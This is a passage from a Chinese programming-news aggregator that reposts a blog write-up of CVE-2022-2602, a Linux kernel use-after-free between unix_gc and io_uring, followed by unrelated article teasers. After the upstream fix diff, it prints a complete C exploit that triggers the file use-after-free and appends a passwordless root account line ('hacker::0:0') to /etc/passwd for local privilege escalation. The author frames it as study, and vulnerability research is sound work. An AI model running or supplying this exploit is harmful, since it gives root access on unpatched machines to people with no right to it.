当前位置：首页 > news >正文

CVE-2022-2602：unix_gc 错误释放 io_uring 注册的文件从而导致的 file UAF

news 文章来源：https://blog.csdn.net/qq_61670993/article/details/138323582 2024/10/23 9:21:46

前言

复现该漏洞只是为了学习相关知识，在这里仅仅做简单记录下 exp，关于漏洞的详细内容请参考其他文章，最后在 v5.18.19 内核版本上复现成功，v6.0.2 复现失败

漏洞利用

diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
index 9fcf534f2d9272..7be5bb4c94b6d8 100644
--- a/include/linux/skbuff.h
+++ b/include/linux/skbuff.h
@@ -803,6 +803,7 @@ typedef unsigned char *sk_buff_data_t;*	@csum_level: indicates the number of consecutive checksums found in*		the packet minus one that have been verified as*		CHECKSUM_UNNECESSARY (max 3)
+ *	@scm_io_uring: SKB holds io_uring registered files*	@dst_pending_confirm: need to confirm neighbour*	@decrypted: Decrypted SKB*	@slow_gro: state present at GRO time, slower prepare step required
@@ -982,6 +983,7 @@ struct sk_buff {#endif__u8			slow_gro:1;__u8			csum_not_inet:1;
+	__u8			scm_io_uring:1;#ifdef CONFIG_NET_SCHED__u16			tc_index;	/* traffic control index */
diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
index 6f88ded0e7e564..012fdb04ec238e 100644
--- a/io_uring/rsrc.c
+++ b/io_uring/rsrc.c
@@ -855,6 +855,7 @@ int __io_scm_file_account(struct io_ring_ctx *ctx, struct file *file)UNIXCB(skb).fp = fpl;skb->sk = sk;
+		skb->scm_io_uring = 1;skb->destructor = unix_destruct_scm;refcount_add(skb->truesize, &sk->sk_wmem_alloc);}
diff --git a/net/unix/garbage.c b/net/unix/garbage.c
index d45d5366115a76..dc276354039321 100644
--- a/net/unix/garbage.c
+++ b/net/unix/garbage.c
@@ -204,6 +204,7 @@ void wait_for_unix_gc(void)/* The external entry point: unix_gc() */void unix_gc(void){
+	struct sk_buff *next_skb, *skb;struct unix_sock *u;struct unix_sock *next;struct sk_buff_head hitlist;
@@ -297,11 +298,30 @@ void unix_gc(void)spin_unlock(&unix_gc_lock);+	/* We need io_uring to clean its registered files, ignore all io_uring
+	 * originated skbs. It's fine as io_uring doesn't keep references to
+	 * other io_uring instances and so killing all other files in the cycle
+	 * will put all io_uring references forcing it to go through normal
+	 * release.path eventually putting registered files.
+	 */
+	skb_queue_walk_safe(&hitlist, skb, next_skb) {
+		if (skb->scm_io_uring) {
+			__skb_unlink(skb, &hitlist);
+			skb_queue_tail(&skb->sk->sk_receive_queue, skb);
+		}
+	}
+/* Here we are. Hitlist is filled. Die. */__skb_queue_purge(&hitlist);spin_lock(&unix_gc_lock);+	/* There could be io_uring registered files, just push them back to
+	 * the inflight list
+	 */
+	list_for_each_entry_safe(u, next, &gc_candidates, link)
+		list_move_tail(&u->link, &gc_inflight_list);
+/* All candidates should have been detached by now. */BUG_ON(!list_empty(&gc_candidates));

unix_gc 错误释放 io_uring 注册的文件导致的 file UAF

exp 如下：

#define _GNU_SOURCE
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <liburing.h>
#include <assert.h>void err_exit(char *msg)
{printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);sleep(5);exit(EXIT_FAILURE);
}void info(char *msg)
{printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}void bind_core(int core)
{cpu_set_t cpu_set;CPU_ZERO(&cpu_set);CPU_SET(core, &cpu_set);sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}void prepare() {system("touch /tmp/dummy");system("chmod 777 /tmp/dummy");
}static int run_wait_lock = 0;
void* slow_write() {#define PAGE_SIZE 0x1000#define WRITE_PAGE_NUMS 0x3333puts("[+] Start in slow_write");int fd = open("/tmp/dummy", O_RDWR);if (fd < 0) err_exit("FAILED to open /tmp/dummy");uint64_t start_addr = 0x30000000;uint64_t write_len = (WRITE_PAGE_NUMS - 1) * PAGE_SIZE;uint64_t i;for (i = 0; i < WRITE_PAGE_NUMS; i++) {void *addr = mmap((void*)(start_addr+i*PAGE_SIZE), PAGE_SIZE,PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);if (addr == MAP_FAILED) err_exit("mmap");}assert(i > 0);struct iovec iovs[20];for (i = 0; i < 20; i++) {iovs[i].iov_base = (void*)start_addr;iovs[i].iov_len = (WRITE_PAGE_NUMS - 1) * PAGE_SIZE;}puts("[+] Occupying inode lock");run_wait_lock = 1;if (writev(fd, iovs, 20) < 0) {err_exit("write");}close(fd);puts("[+] End in slow_write");puts("[+] Waiting for 10 senonds");sleep(10);exit(0);
}void sendfd(int sfd, int fd) {struct msghdr msg;char control_buf[4096] = { 0 };struct cmsghdr* cmsg;int fds[1] = { fd };memset(&msg, 0, sizeof(msg));msg.msg_control = control_buf;msg.msg_controllen = sizeof(control_buf);cmsg = CMSG_FIRSTHDR(&msg);cmsg->cmsg_level = SOL_SOCKET;cmsg->cmsg_type = SCM_RIGHTS;cmsg->cmsg_len = CMSG_LEN(sizeof(fds));memcpy(CMSG_DATA(cmsg), &fds, sizeof(fds));msg.msg_controllen = CMSG_SPACE(sizeof(fds));sendmsg(sfd, &msg, 0);
}int main() {int s[2];int rfd[2];int io_uring_fd;pthread_t thr1;struct io_uring_sqe* sqe;struct io_uring ring;struct stat st;struct iovec iov[1];int fds[300];int i = 0;bind_core(0);prepare();for (i = 0; i < 300; i++) {if ((fds[i] = open("/etc/passwd", O_RDONLY)) < 0)err_exit("open /etc/passwd");}stat("/etc/passwd", &st);int size = 0;int orig_size = st.st_size;/* hacker::0:0:/root:/root:/bin/sh\n */iov[0].iov_base = "hacker::0:0:/root:/root:/bin/sh\n";iov[0].iov_len = strlen(iov[0].iov_base);// s[0]         ref_count = 1// s[1]         ref_count = 1if (socketpair(AF_UNIX, SOCK_DGRAM, 0, s) < 0) err_exit("sockerpair");// s[0]         ref_count = 1// s[1]         ref_count = 1// io_uring_fd  ref_count = 1// rfd[1]       ref_count = 1io_uring_queue_init(32, &ring, IORING_SETUP_SQPOLL);sqe = io_uring_get_sqe(&ring);printf("[+] sqe: %p\n", sqe);io_uring_fd = ring.ring_fd;printf("[+] io_uring_fd: %d\n", io_uring_fd);if (io_uring_fd < 0) err_exit("io_uring_queue_init");rfd[0] = s[1];rfd[1] = open("/tmp/dummy", O_RDWR|O_APPEND);// s[0]         ref_count = 1// s[1]         ref_count = 2   inflight = 1// io_uring_fd  ref_count = 1// rfd[1]       ref_count = 2// io_uring.sk_recvive_queue -> rfd {s[1], rfd[1]}io_uring_register_files(&ring, rfd, 2);sqe->opcode = IORING_OP_WRITEV;sqe->fd = 1;sqe->addr = (long long)iov;sqe->len = 1;sqe->flags = IOSQE_FIXED_FILE;// s[0]         ref_count = 1// s[1]         ref_count = 2   inflight = 1// io_uring_fd  ref_count = 1// rfd[1]       ref_count = 1// io_uring.sk_recvive_queue -> rfd {s[1], rfd[1]}close(rfd[1]);// s[0]         ref_count = 1// s[1]         ref_count = 2   inflight = 1// io_uring_fd  ref_count = 2   inflight = 1// rfd[1]       ref_count = 1// io_uring.sk_receive_queue -> rfd {s[1], rfd[1]}// s[1].sk_receive_queue     -> io_uring_fdsendfd(s[0], io_uring_fd);// s[0]         ref_count = 0 ==> free// s[1]         ref_count = 1   inflight = 1// io_uring_fd  ref_count = 2   inflight = 1// rfd[1]       ref_count = 1// io_uring.sk_receive_queue -> rfd {s[1], rfd[1]}// s[1].sk_receive_queue     -> io_uring_fdclose(s[0]);close(s[1]);// 占据 inode 锁pthread_create(&thr1, NULL, slow_write, NULL);// writev 等待 inode 锁while (!run_wait_lock) {}sleep(2);io_uring_submit(&ring);// s[0]         ref_count = 0 ==> free// s[1]         ref_count = 1   inflight = 1// io_uring_fd  ref_count = 1   inflight = 1// rfd[1]       ref_count = 1// io_uring.sk_receive_queue -> rfd {s[1], rfd[1]}// s[1].sk_receive_queue     -> io_uring_fdio_uring_queue_exit(&ring);puts("[+] Triggering unix_gc");// 触发 unix_gc// s[0]         ref_count = 0 ==> free// s[1]         ref_count = 1   inflight = 1// io_uring_fd  ref_count = 1   inflight = 1// rfd[1]       ref_count = 1// io_uring.sk_receive_queue -> rfd {s[1], rfd[1]}// s[1].sk_receive_queue     -> io_uring_fd// 此时 rfd[1] 被错误的释放 ==> rfd[1]sleep(2);for (i = 0; i < 150; i++) {close(fds[i+2]);}close(socket(AF_UNIX, SOCK_DGRAM, 0));puts("[+] unix_gc done");puts("[+] Spray /etc/passwd file");// 打开大量 /etc/passwd 去占据 uaf_filefor (i = 0; i < 700; i++) {if (open("/etc/passwd", O_RDONLY) < 0) {printf("[X] Error at %d\n", i);err_exit("FAILED to spray file");}}// 等待 writev 获取 inode 锁，从而写 /etc/passwd// 当 /etc/passwd 文件大小发送变化时，说明成功向 /etc/passwd 写入恶意数据puts("[+] Waiting for overwriting /etc/passwd");while (orig_size == st.st_size) {stat("/etc/passwd", &st);size = st.st_size;sleep(1);}puts("[+] su hacker to get root");return 0;
}

效果如下：
在这里插入图片描述

参考文章

[漏洞分析] CVE-2022-2602 io_uring UAF内核提权详细解析
【kernel exploit】CVE-2022-2602垃圾回收错误释放iouring的file导致UAF

CVE-2022-2602：unix_gc 错误释放 io_uring 注册的文件从而导致的 file UAF

前言复现该漏洞只是为了学习相关知识，在这里仅仅做简单记录下 exp，关于漏洞的详细内容请参考其他文章，最后在 v5.18.19 内核版本上复现成功，v6.0.2 复现失败漏洞利用 diff --git a/include/linux/skbuff.h b/include/linux/s…...

编程日记 2024/5/7 1:30:16

LSTM实战笔记（部署到C++上）——更新中

前几天由于自己的个人原因停止了学习接下里继续更新一些自己项目中所用到的神经网络等 ——————————————————————————————————————————— LSTM代码介绍建立LSTM模型时需要设置一些参数，包括输入数据的形状、LSTM层的…...

编程日记 2024/5/7 1:29:14

鸿蒙内核源码分析(消息队列篇) | 进程间如何异步传递大数据

基本概念队列又称消息队列，是一种常用于任务间通信的数据结构。队列接收来自任务或中断的不固定长度消息，并根据不同的接口确定传递的消息是否存放在队列空间中。任务能够从队列里面读取消息，当队列中的消息为空时，挂起读取任务…...

编程日记 2024/5/7 1:28:13

Sentinel流量防卫兵

1、分布式服务遇到的问题服务可用性问题服务可用性场景服务雪崩效应因服务提供者的不可用导致服务调用者的不可用,并将不可用逐渐放大的过程，就叫服务雪崩效应导致服务不可用的原因： 在服务提供者不可用的时候，会出现大量重试的情况&…...

编程日记 2024/5/7 1:27:12

微信小程序：14.什么是wxs，wxs的使用

wxs是小程序独有的一套脚本语言，结合wxml，可以构建出页面的结构 wxs的应用场景 wxml中无法调用在页面的js中定义的函数，但是wxml可以调用wxs中定义的函数。因此小程序中wxs的典型应用场景就是过滤器 wxs和js的关系 wxs有自己的数据类型 …...

编程日记 2024/5/7 1:26:10

Django运行不提示网址问题

问题描述：运行django项目不提示网址信息，也就是web没有起来，无法访问。 (my-venv-3.8) PS D:\Project\MyGitCode\public\it_blog\blog> python .\manage.py runserver INFO autoreload 636 Watching for file changes with StatReloader …...

编程日记 2024/5/7 1:24:08

web安全---xss漏洞/beef-xss基本使用

what xss漏洞----跨站脚本攻击（Cross Site Scripting），攻击者在网页中注入恶意脚本代码，使受害者在浏览器中运行该脚本，从而达到攻击目的。分类反射型---最常见，最广泛用户将带有恶意代码的url打开&a…...

编程日记 2024/5/7 1:23:06

第一天学习（GPT）

1.图片和语义是如何映射的？ **Dalle2：**首先会对图片和语义进行预训练，将二者向量存储起来，然后将语义的vector向量转成图片的向量，然后基于这个图片往回反向映射（Diffusion）——>根据这段描…...

编程日记 2024/5/7 1:21:04

【C++之AVL树旋转操作的详细图解】

C++学习笔记---022 C++之AVL树旋转操作的详细图解1、AVL树的简单介绍1.1、基本概念1.2、平衡因子1.3、AVL树的特性2、C++中pair的介绍2.1、定义和初始化2.2、访问元素2.3、作为容器的元素2.4、作为函数的返回值3、AVL树节点的定义4、AVL的插入规则探究5、AVL树的旋转操作5.1、R…...

编程日记 2024/5/7 1:20:03

1 python生成一个sector数据 def get_oem_bootmode(): # Header size SECTOR_SIZE_IN_BYTES 512 header [0 for i in \ range(SECTOR_SIZE_IN_BYTES)] # magic # The ord() built-in function in # Python converts a character # into …...

编程日记 2024/5/7 1:19:02

如何代码激活service——packageKit 系统更新番外

在访问packageKit服务的过程中，服务一直访问失败，PackageKit::Daemon::global()->isRunning() 一直返回false，他是一个用于检查 PackageKit 守护进程是否正在运行的函数调用。在 Qt 和 PackageKit 的集成中，isRunning 方法通常…...

编程日记 2024/5/7 1:15:59

音视频常用工具

VLC 播放器简介 VLC 播放器 VLC支持多种常见音视频格式，支持多种流媒体传输协议，也可当作本地流媒体服务器使用，功能十分强大。官网下载地址: https://www.videolan.org/ VLC media player VLC 是一款自由、开源的跨平台多媒体播放器及框架&…...

编程日记 2024/5/7 1:10:52

周刊是聪明人筛选优质知识的聪明手段！

这是一个信息过载的时代，也是一个信息匮乏的时代。这种矛盾的现象在 Python 编程语言上的表现非常明显。它是常年高居编程语言排行榜的最流行语言之一，在国外发展得如火如荼，开发者、项目、文章、播客、会议活动等相关信息如海如潮。但…...

编程日记 2024/5/7 1:09:51

设计模式Java实现-建造者模式

楔子小七在2019年的时候，就想写一个关于设计模式的专栏，但是最终却半途而废了。粗略一想，如果做完一件事要100分钟，小七用3分钟热情做的事，最少也能完成10件事情了。所以这一次，一定要把他做完&#xff0…...

编程日记 2024/5/7 1:07:49

微博视频怎么下载无水印

在当今社交媒体时代，微博已经成为人们获取信息、分享生活的重要平台之一。许多人在浏览微博时常常遇到一个问题：如何下载微博视频而不留下烦人的水印呢?今天，我将分享一些神秘的方法，让你轻松解锁微博视频的无水印下载技巧。第…...

编程日记 2024/5/7 1:06:47

为什么要梯度累积

文章目录梯度累积什么是梯度累积如何理解理解梯度累积梯度累积的工作原理梯度累积的数学原理梯度累积过程如何实现梯度累积梯度累积的可视化梯度累积什么是梯度累积随着深度学习模型变得越来越复杂，模型的训练通常需要更多的计算资源，特别是在训…...

编程日记 2024/5/7 1:02:43

知识图谱在提升大语言模型性能中的应用：减少幻觉与增强推理的综述

幻觉现象指的是模型在生成文本时可能会产生一些听起来合理但实际上并不准确或相关的输出，这主要是由于模型在训练数据中存在知识盲区所致。为了解决这一问题，研究人员采取了多种策略，其中包括利用知识图谱作为外部信息源。知识图谱通过将信息…...

编程日记 2024/5/7 1:01:41

P8800 [蓝桥杯 2022 国 B] 卡牌

P8800 [蓝桥杯 2022 国 B] 卡牌分析 “最多” -- 二分 1.二分区间（凑齐的卡牌套数）： l：a[]min；r：(a[]b[])max 2.check(x)： （1）for循环内： 判断x - a[i…...

编程日记 2024/5/7 0:59:38

MySQL商城数据表（80-84）

80商品规格值表 DROP TABLE IF EXISTS niumo_spec_items; CREATE TABLE niumo_spec_items (itemId int(11) NOT NULL AUTO_INCREMENT COMMENT 自增ID,shopId int(11) NOT NULL DEFAULT 0 COMMENT 店铺ID,catId int(11) NOT NULL DEFAULT 0 COMMENT 类型ID,goodsId int(11) NOT…...

编程日记 2024/5/7 0:58:36

使用Gitbook生成电子书

背景《Google工程实践文档》相对原文Google’s Engineering Practices documentation ，部分内容过时了。需要更新中文版，并使用Gitbook把Markdown文件转换成对应的PDF电子书。　　上一次生成PDF电子书是5年前，当时生成电子书的环境早已不在…...

编程日记 2024/5/7 0:56:34

设计模式之传输对象模式

在编程江湖里，有一种模式，它如同数据的“特快专递”，穿梭于系统间，保证信息的快速准确送达，它就是——传输对象模式（Data Transfer Object, DTO）。这不仅仅是数据的搬运工，更是提升系…...

编程日记 2024/5/7 0:55:32

Re69：读论文 LaMDA: Language Models for Dialog Applications

诸神缄默不语-个人CSDN博文目录诸神缄默不语的论文阅读笔记和分类论文名称：LaMDA: Language Models for Dialog Applications ArXiv网址：https://arxiv.org/abs/2201.08239 本文介绍谷歌提出的对话大模型LaMDA，主要关注对各项指标&#x…...

编程日记 2024/5/7 0:54:31

算法学习：二分查找

🔥 引言在现代计算机科学与软件工程的实践中，高效数据检索是众多应用程序的核心需求之一。二分查找算法，作为解决有序序列查询问题的高效策略，凭借其对数时间复杂度的优越性能，占据着算法领域里举足轻重的地位。本篇内…...

编程日记 2024/5/7 0:53:30

github提交代码失败解决方案

1.打开github.push 工具如果未安装github客户端请参考附录github 安装配置 2.设置Git的user name和email git config --global user.name "yourname" git config --global user.email "youremail" 3.生成SSH密钥查看是否已经有了ssh密钥&#xff1…...

编程日记 2024/5/7 0:52:28

连锁收银系统总仓到门店库存调拨操作教程

1、进入系统后台，系统后台登录网址： 2、点击商品>门店调拨 3、选择调出仓库和调入门店 4、可选择添加商品逐个进行调拨，也可以批量导入需要调拨的商品然后点击确定。 5、新增调拨后，系统会显示“待出库”状态 6、仓库已经准备…...

编程日记 2024/5/7 0:51:27

公网tcp转流

之前做过几次公网推流的尝试, 今天试了UDP推到公网, 再用TCP从公网拉下来, 发现不行, 就直接改用TCP转TCP了. 中间中转使用的python脚本, 感谢GPT提供技术支持: import socket import threadingdef tcp_receiver(port, forward_queue):"""接收TCP数据并将其放入…...

编程日记 2024/5/7 0:50:26

【Linux 基础 IO】文件系统

文章目录 1.初步理解文件2. fopen ( )的详解 1.初步理解文件 🐧① 打开文件： 本质是进程打开文件； 🐧②文件没有被打开的时候在哪里呢？ ----- 在磁盘中； 🐧③进程可以打开很多个文件吗&#xff…...

编程日记 2024/5/7 0:49:24

Chrome浏览器安装React工具

一、如果网络能访问Google商店，直接安装官方插件即可二、网络不能访问Google商店，使用安装包进行安装 1、下载react工具包链接：https://pan.baidu.com/s/1qAeqxSafOiNV4CG3FVVtTQ 提取码：vgwj 2、chrome浏览器安装react工具…...

编程日记 2024/5/7 0:48:23

React常用组件分享

1、轮播组件： React Awesome Slider React Slider Carousel Component - react-awesome-slider...

编程日记 2024/5/7 0:43:18

JSON原生AJAX

文章目录 JSONFastjsonfastjson引入fastjson 常用APIfastjson作用常用API使用实例 ajax和json综合(重要)请求参数和响应数据都是普通字符串响应数据改为json格式请求和响应都是js数据封装到Result类和抽取到BaseController 原生AjaxAJAX的执行流程XMLHttpRequest对象使用原生的…...

编程日记 2024/5/7 0:42:17

网页设计后面是网站建设吗/全球网站流量排名查询

1、下载swagger ui：http://swagger.io/swagger-ui/； 2、在应用目录里新建一个目录xxx：如图 3、解压后把dist目录的所有文件拷贝到新建的目录里面； 4、在新建的目录里面新建一个php文件，把index.html的代码拷贝到新建的…...

编程日记 2024/10/23 8:15:01

昌邑建设网站/怎么找到当地的微信推广

点击上方蓝色字体，选择“标星公众号”优质文章，第一时间送达关注公众号后台回复pay或mall获取实战项目资料视频作者：larva-zhangwww.cnblogs.com/larva-zhh/p/13723530.html近期，公司推行正版化，本人使用的是JetBrains…...

编程日记 2024/10/23 3:22:54

聊城公司做网站/网站注册地址查询

数字硬件建模SystemVerilog(四)-综合综合编译器将实现细节添加到抽象RTL模型，合成编译器： 将RTL功能转换为等效功能的通用逻辑门。将通用门映射到特定的ASIC或FPGA目标。执行逻辑优化以满足时钟速度要求。执行逻辑优化以满足面积和功率要求&#…...

编程日记 2024/10/22 22:26:51

南京网页设计培训机构/新手怎么入行seo

CentOS 6.X 自带的软件源可选的并不多，有时候要找到一个偏门一些的软件，用命令一搜怎么都没有源，考虑到使用软件源配合 yum 命令安装可以自动安装依赖，所以加一个新的软件源迫在眉睫。考虑到同根性，如果安装第三方的源…...

编程日记 2024/10/22 18:37:49

网站建设英文版/免费网页模板网站

一、Spark是什么 Spark是一种快速、通用、可扩展的大数据分析引擎。Spark生态系统已经发展成为一个包含多个子项目的集合，其中包含SparkSQL、Spark Streaming、GraphX、MLib、SparkR等子项目，Spark是基于内存计算的大数据并行计算框架。除了扩展了广泛使…...

编程日记 2024/10/22 17:01:22

做视频有赚钱的网站有哪些/重庆seo技术分享

新版《药品经营质量管理规范》培训测试姓名____________ 岗位____________ 分数____________一、填空题1、新版《药品经营质量管理规范》于_______年_____月____日开始实施。2、为加强药品______________，规范药品____________，保障___________________&…...

编程日记 2024/10/22 16:35:55

前言

漏洞利用

参考文章

相关文章：